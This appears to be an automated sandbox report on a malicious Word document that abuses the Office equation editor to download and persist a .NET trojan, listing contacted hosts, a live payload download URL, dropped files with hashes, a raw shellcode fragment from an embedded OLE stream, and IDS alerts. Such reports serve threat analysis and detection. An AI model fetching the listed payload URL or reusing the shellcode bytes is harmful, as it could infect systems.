http://DynDns.comDynDNS	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://discord.com/	tthxx.exe	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	tthxx.exe, 00000004.00000002.2246288441.0000000005780000.00000002.00000001.sdmp, tthxx.exe, 00000008.00000002.2246287601.00000000057C0000.00000002.00000001.sdmp, tthxx.exe, 0000000B.00000002.2346087548.0000000005D30000.00000002.00000001.sdmp	false		high
https://discord.com/6	tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000004.00000002.2242103851.0000000000C63000.00000004.00000020.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mNVnNH.com	tthxx.exe, 0000000B.00000002.2345059510.0000000002461000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/:	tthxx.exe, 00000004.00000000.2125555578.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 00000008.00000002.2242647544.0000000000990000.00000002.00020000.sdmp, tthxx.exe, 0000000B.00000000.2239632507.0000000000180000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.210.20.6	unknown	Netherlands		61157	PLUSSERVER-ASN1DE	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404303
Start date:	04.05.2021
Start time:	22:00:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	IMG_05412_868_21.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOCX@12/11@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.2% (good quality ratio 0.2%) Quality average: 62.5% Quality standard deviation: 14.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer
Warnings:	Show All Report size exceeded maximum capacity and may have missing behavior information. TCP Packets have been reduced to 100 Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:01:57	API Interceptor	84x Sleep call for process: EQNEDT32.EXE modified
22:01:59	API Interceptor	897x Sleep call for process: tthxx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
31.210.20.6	PL_503_13_570.docx	Get hash	malicious	Browse	31.210.20.6/3/Sugvt.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PLUSSERVER-ASN1DE	PL_503_13_570.docx	Get hash	malicious	Browse	31.210.20.6
	mzJ8O3L58V.exe	Get hash	malicious	Browse	31.210.20.238
	vwr 30.04.2021.pdf.exe	Get hash	malicious	Browse	31.210.21.236
	VWR CI 290421.xlsx.exe	Get hash	malicious	Browse	31.210.21.236
	it54qPllN4.exe	Get hash	malicious	Browse	31.210.21.71
	FPI_874101020075.xlsx	Get hash	malicious	Browse	31.210.21.71
	mzJ8O3L58V.exe	Get hash	malicious	Browse	31.210.20.238
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	31.210.21.99
	ORDER I_5130_745_618.xlsx	Get hash	malicious	Browse	31.210.21.231
	RFQ 00234567828723635387632988822.jar	Get hash	malicious	Browse	31.210.21.99
	6381ca8d_by_Libranalysis.xlsx	Get hash	malicious	Browse	31.210.20.238
	Annexure A-61322.jar	Get hash	malicious	Browse	31.210.21.99
	PLI5130745618.exe	Get hash	malicious	Browse	31.210.21.231
	EPC Works for AMAALA AIRFIELD PROJECT - WORK .jar	Get hash	malicious	Browse	31.210.21.99
	ShippingDocuments.exe	Get hash	malicious	Browse	31.210.21.236
	purchase order confirmation.exe	Get hash	malicious	Browse	31.210.21.181
	purchase order acknowledgement.exe	Get hash	malicious	Browse	31.210.21.181
	TBBurmah Trading Co., Ltd - products inquiry .exe	Get hash	malicious	Browse	31.210.21.181
	RFQ #ER428-BD.exe	Get hash	malicious	Browse	31.210.21.203
	PaymentAdvice.exe	Get hash	malicious	Browse	31.210.20.71

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\44444[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Reputation:	low
IE Cache URL:	http://31.210.20.6/3/44444.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E92F7FC7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 288 x 424, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84949
Entropy (8bit):	7.992825260372582
Encrypted:	true
SSDEEP:	1536:JPs/c63J2lk4Gjh3mkGaWqOJcJ8BsjTxfNbQ2ds7WQGBJeDSl:JPMtIlkdjh2kJWgjpf1b/eDI
MD5:	23A2AF973BBF6CC30633EB218EF11067
SHA1:	69E4BB8450F096694A026CA859498AE30D3FB1FB
SHA-256:	1AD903E11D4A00E9AF3A24E5F92A71295A693945CC3BBF894D6176BA831445C4
SHA-512:	85376D9C5A4B688E781938F11AE3CBB592F86C4593B7BCC8E74EE32ECEB0FF374A17B5DFFD8E3ECA0498420AB07F04A75423992416B33BE59EA35836671BB838
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR... ..........`85.. .IDATx....8.%FR.. @....y..&...D.eU.HI..{..q..D...b.o..t+.Rs.c..._M-(...~'...o...O6}..\|..s...._.g...md.Z...cJ...uI9.TJ..r..%.9..s.....'~...^...........o...w...r....3..e..m...~.R.w..{....ui.E~iS^}.......}.x.N.......I.....?o.;j...x..G....FcW....Wr...op-....z.+..............?........+M..3...j.....%..9......Q......)...o....?3...-...tV.F....m.I.@.t...&.}.....w....>...p..........F...!,..&k....y.,ky.@O.B..BZmI..Z...9...A....>. d..\|f.a...yh^....?...?......2...........@.g\z.K....4~_.Os.....gC.oT.C.Y...Ab..p?w......Z...~Z...\|.H>M9x..}.b.~..?.......`q....2?,....0..@.....k..\|F..@....{.t...=.N..R"I).w/.5Ox..g...E)b.,f....).a..+..].^. ...ic+.2%O..d..M...l;.D).......W...H.nL.....-....m..C.......!U..{2.f?.f..A..("....).:.G>..U.....DD.\|w.wi.oR...jG.......@,..e6..K{.t.0...#j.&../..j.....:..t/...}..x....K.#1K.'3h.A.a....\|~.P.n.3.......OF......O.'.4.+.....kK....=T*.~.Y..0.i2.,..2`B.w.q..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3E742551-7EEA-4C35-A601-2DE7AC9E238F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Targa image data - RLE 65536 x 65536 x 0 ""
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	0.3471815213908766
Encrypted:	false
SSDEEP:	3:ylYdltn/lL6VVg7Na0clWQaK/llltlNl/ma/ldzNBBllqPxZlhQtChj:13MVKpalYQaK/cqz0PxZUta
MD5:	B03078EFAA0090390ABB3DBCB03888E1
SHA1:	8EB8C69A8DEC6BF967365685C62FFF03B4E4EF34
SHA-256:	5DA54FED2B54DE4A701FDC6BEC06670C6836C02F01EC9ABCD83786237D12A3D5
SHA-512:	B3984B543B95746E9029337A5BFA0A9BD40F4322BE49E1581CC4136464A59EF7CAFAC2C1EA87526E3BFF8AD0170AE1235FC184399D9FBD222725712355B9E9BD
Malicious:	false
Reputation:	low
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4ABA8B27-B28F-4AE5-86AD-026C320EA73C}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tthxx.exe Download File
Process:	C:\Users\user\tthxx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IMG_05412_868_21.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Wed May 5 04:01:37 2021, length=96379, window=hide
Category:	dropped
Size (bytes):	2098
Entropy (8bit):	4.54273536544135
Encrypted:	false
SSDEEP:	24:8Q624k/XTm6GreVb4rejVlMcDv3qSndM7dD2Q624k/XTm6GreVb4rejVlMcDv3ql:8W/XTFGqMUEWQh2W/XTFGqMUEWQ/
MD5:	15A833EC52FD4FC187123BEACB704EF0
SHA1:	E7E7C471674FFECA9687448EC3E4DB5B21CEB6D6
SHA-256:	CD4FC7A6BE04C0DB2F1B85C99B9391C212641169CA78C88719E32AE83C1C8DC7
SHA-512:	C353A6DC51A04443FC2DEC6324DAE2BB29E6CB127888D9E02D6F33BAEF1334EFB09A08A5204D358DDA8F071744B493395C1EDFD7F0CDA182941C8A3E31039E5E
Malicious:	false
Preview:	L..................F.... ...C...{..C...{....G.kA..{x...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2.{x...R3( .IMG_05~1.DOC..X.......Q.y.Q.y...8.....................I.M.G._.0.5.4.1.2._.8.6.8._.2.1...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\IMG_05412_868_21.docx.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.M.G._.0.5.4.1.2._.8.6.8._.2.1...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9F.C

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.4356649311036564
Encrypted:	false
SSDEEP:	3:HnySdTfpS0zdTfpSmxWnySdTfpSv:Hnzdj7djkzdjC
MD5:	9C48449D50548F63F4EB2D8F20F4E772
SHA1:	2F955196DEC8A57E2E5DC87168430ED6F1E19ECE
SHA-256:	DC8F78A041AA54A472E3BBDE699F3E8EB86A322E738D9FF76C55FCD41B3D9FAC
SHA-512:	8210427CE9E37E625097386901F61AF026CDDF440300D197E5105BACD7D49BEACC22C7DCAE5E9F785157C4D4251E4B378D24DC9DAC268DA1D61ABBAF2CF0139A
Malicious:	false
Preview:	[misc]..IMG_05412_868_21.LNK=0..IMG_05412_868_21.LNK=0..[misc]..IMG_05412_868_21.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notpad\notpad.exe Download File
Process:	C:\Users\user\tthxx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

C:\Users\user\Desktop\~$G_05412_868_21.docx Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\tthxx.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	343352
Entropy (8bit):	7.841371992370745
Encrypted:	false
SSDEEP:	6144:FL4Qez8X+5KBrIxuNWUwJm4OdB17ZDs0s7xHAVkYifH4TWcwb8tFHQK:V4Qez+YSSjUAmdr17Zw0+geYqH41wb88
MD5:	CCE6C363C0FF7AC663CD71C5906069A6
SHA1:	98AD5E24BF99FBB4CF7BDCAA54B6D720064DC810
SHA-256:	B65EED317058DF5DDD4247EC93AC2B555AE2C29B751EE455CEEE3DD9B670ECAD
SHA-512:	C3E28465D1FB8673D4B203D3A985AF370255E1381EA8D9DB910F213EFFC4F5C3CA0214497FA783396A25C4316D5CDDE6F05A35BBF44581EF5BC4C2FCD4F8FA1B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 40%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..`.....................J......^.... ........@.. ....................................@.....................................K.......,G..............8....`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...,G.......H..................@..@.reloc.......`......................@..B................@.......H........J..$,...........w...y...........................................0...........:.........(/...8....&.....(...........s....o.... .>n.(5....:6...& .>n.(5.........%.(-.....:!...&& a>n.(5...('...&8....((...8....(...8.....................0..........(.........(....o.... ^>n.(5...(....o.....:....&8.....8....s.....:....&..o.....o....s.....9....&8.....8.....8....s.......s....s.........o...........o......o............o...........o.....(......o............9.....o.......*.4......

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	7.990365980812427
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	IMG_05412_868_21.docx
File size:	96379
MD5:	8832e0557e1b144bad206ed6d14d5c34
SHA1:	4b729d3262362a2ab3edab09ac1f625af8f5e0c1
SHA256:	fbd1b454da7fecb92c40b9b2f74fc8fecae79340afdc011e7c0d6339fabdcfde
SHA512:	568c6f935ae270f464ee79e53a5b0df62788bf9783de01b6f64d95c4f0845851849be8002f6bdc5b30f89ffd4cb06cc7ba3ca81907e9529d59b02363fb11f140
SSDEEP:	1536:zf0WCyPs/c63J2lk4Gjh3mkGaWIpOJcJ8BsjTxfNbQxds7WQGBJeDSD:zfpCyPMtIlkdjh2kJWgjpfmb/eDI
File Content Preview:	PK........l..R....z...0.......[Content_Types].xmlUT...:..`:..`:..`.T.n.0..W.?D."b........T...=...d...;.4.....%.=....o0Zk.-..iMA.y.d`......1}.>.,Df.S.@A6..hx{3.n....&.d..{.4.9h.r..`..^..G?.../6.z...SnM...1q.....P1{Y......H..mLZ.a.).Y.:].....)...{.\....B.

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Static OLE Info

General
Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/404303/sample/IMG_05412_868_21.docx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Title:
Subject:
Author:	Dell
Keywords:
Template:	Normal.dotm
Last Saved By:	Dell
Revion Number:	1
Total Edit Time:	1
Create Time:	2021-04-28T13:50:00Z
Last Saved Time:	2021-04-28T13:51:00Z
Number of Pages:	1
Number of Words:	0
Number of Characters:	0
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Number of Lines:	0
Number of Paragraphs:	0
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	15.0000

Streams

Stream Path: \x1oLE10naTiVE, File Type: data, Stream Size: 1420

General
Stream Path:	\x1oLE10naTiVE
File Type:	data
Stream Size:	1420
Entropy:	7.59554617701
Base64 Encoded:	False
Data ASCII:	= o . . . ~ . . G . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . D . . . . . . . . . ^ . . . b . . . . . . . . . . . . . P . . . . . 1 . . n . . . . 4 . . - . $ . i S . U . . . { . . . 9 . G . . I . Q . . . ' . . . . . G . . . P R Z V . . . . I . . . . . H . . . . { . . . ^ X . Y . . . . 7 k . . . . . . . . . . . . T . . . . . . . . . i . k c . & . . . . . . . . . \\ . . . . u ` l . . . . . g . . . . . . S P S . . . $ . . .
Data Raw:	3d 6f fb 04 03 7e 01 eb 47 0a 01 05 37 89 85 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 06 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 c3 44 00 00 00 00 e8 00 00 00 00 5e eb 02 eb 62 81 c6 a8 02 00 00 8d 8e 8f 02 00 00 eb 50 e9 d2 00 00 00 31 06 eb 6e 90 eb 07 13 34 ee d6 2d a4 24 05 69 53 8c 55

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/04/21-22:01:56.453454	TCP	2022566	ET TROJAN Possible Malicious Macro EXE DL AlphaNumL	49167	80	192.168.2.22	31.210.20.6
05/04/21-22:01:56.453454	TCP	2022550	ET TROJAN Possible Malicious Macro DL EXE Feb 2016	49167	80	192.168.2.22	31.210.20.6
05/04/21-22:01:56.453454	TCP	2021245	ET TROJAN Possible Dridex Download URI Struct with no referer	49167	80	192.168.2.22	31.210.20.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 22:01:56.403867006 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.452884912 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.453023911 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.453454018 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.503766060 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505009890 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505034924 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505050898 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505068064 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505080938 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505085945 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505105019 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505109072 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505120039 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505129099 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505137920 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505146980 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505156994 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505171061 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505175114 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.505202055 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.505213022 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.522548914 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555527925 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555557966 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555579901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555603981 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555608034 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555630922 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555633068 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555635929 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555656910 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555663109 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555672884 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555691004 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555702925 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555717945 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555732012 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555742979 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555767059 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555768967 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555790901 CEST	80	49167	31.210.20.6	192.168.2.22
May 4, 2021 22:01:56.555793047 CEST	49167	80	192.168.2.22	31.210.20.6
May 4, 2021 22:01:56.555815935 CEST	80	49167	31.210.20.6	192.168.2.22
